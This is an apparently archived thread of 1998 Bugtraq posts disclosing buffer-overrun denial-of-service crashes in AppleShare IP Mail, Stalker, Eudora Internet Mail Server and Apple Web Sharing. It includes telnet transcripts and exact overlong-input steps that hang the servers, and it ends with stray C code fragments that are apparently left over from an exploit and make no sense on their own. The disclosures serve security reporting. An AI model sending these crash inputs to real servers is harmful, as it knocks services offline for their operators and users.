|
Date: Wed, 8 Apr 1998 13:11:17 +1200 From: Chris Wedgwood <chris@CYBERNET.CO.NZ> To: BUGTRAQ@NETSPACE.ORG Subject: AppleShare IP Mail Server [Yet another buffer overrun? - I hope this isn't getting monotonous] I noticed this a while back but haven't seen any else mention it. There appears to be what looks like a buffer overrun problem with AppleShare IP Mail Server. If you connect to the SMTP port and issue a long string (say 500 bytes or so) the server crashes - and because its a Mac, it usually crashed the whole machine to the point where it needs a reboot. So far I've only tested against servers which emit the banner 'AppleShare IP Mail Server 5.0.3' For example: $ telnet some.where Trying 1.2.3.4... Connected to some.where. Escape character is '^]'. 220 some.where AppleShare IP Mail Server 5.0.3 SMTP Server Ready HELO XXXXXXXXXXX[....several hundered of these....]XXXXXXXX [ and it just hangs ] $ ping some.where [ ...nothing... ] Physically checking the machine shows it has `locked up' and it a reboot. I assume if you can cause a crash without the lockup then you might be able to execute code and so something useful (on a Mac?). -cw Date: Wed, 8 Apr 1998 12:34:09 +0800 From: David Luyer <luyer@UCS.UWA.EDU.AU> To: BUGTRAQ@NETSPACE.ORG Subject: Re: AppleShare IP Mail Server Chris Wedgewood wrote: > 220 some.where AppleShare IP Mail Server 5.0.3 SMTP Server Ready > HELO XXXXXXXXXXX[....several hundered of these....]XXXXXXXX > [ and it just hangs ] Same with 220-Stalker Internet Mail Server V.1.6 is ready. 220 ESMTP is spoken here. HELO xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx [dead] But then, isn't that expec fea ted of using toy machines (Macs/Win PCs) for servers? David. Date: Tue, 14 Apr 1998 10:01:05 -0400 (EDT) From: Netstat Webmaster <feh@netstat.net> Subject: MacOS based buffer overflows... Eudora Internet Mail Server vs. 1.2, 2.0, 2.01 DoS Telnet to port 106 of an EIMS server. Type USER xxxxxxxxxxxx(at least a 1000+ char string). EIMS will crash. Occasionally taking the entire machine with it. --- Apple's Web Sharing DoS Telnet to port 80 of a Web Sharing server (built into system 8.0+). Upon connect enter any string of at least 3000+ characters. Hit return twice, Web Sharing will stop servicing. It does not seem to make the server any less stable and Web Sharing seems to be able to be restarted with out a reboot and without any ill effects. Phanty. printf("usage: %s <smtp server>\n", argv[0]); exit(1); printf("Unknown host: %s\n",argv[1]); exit(1);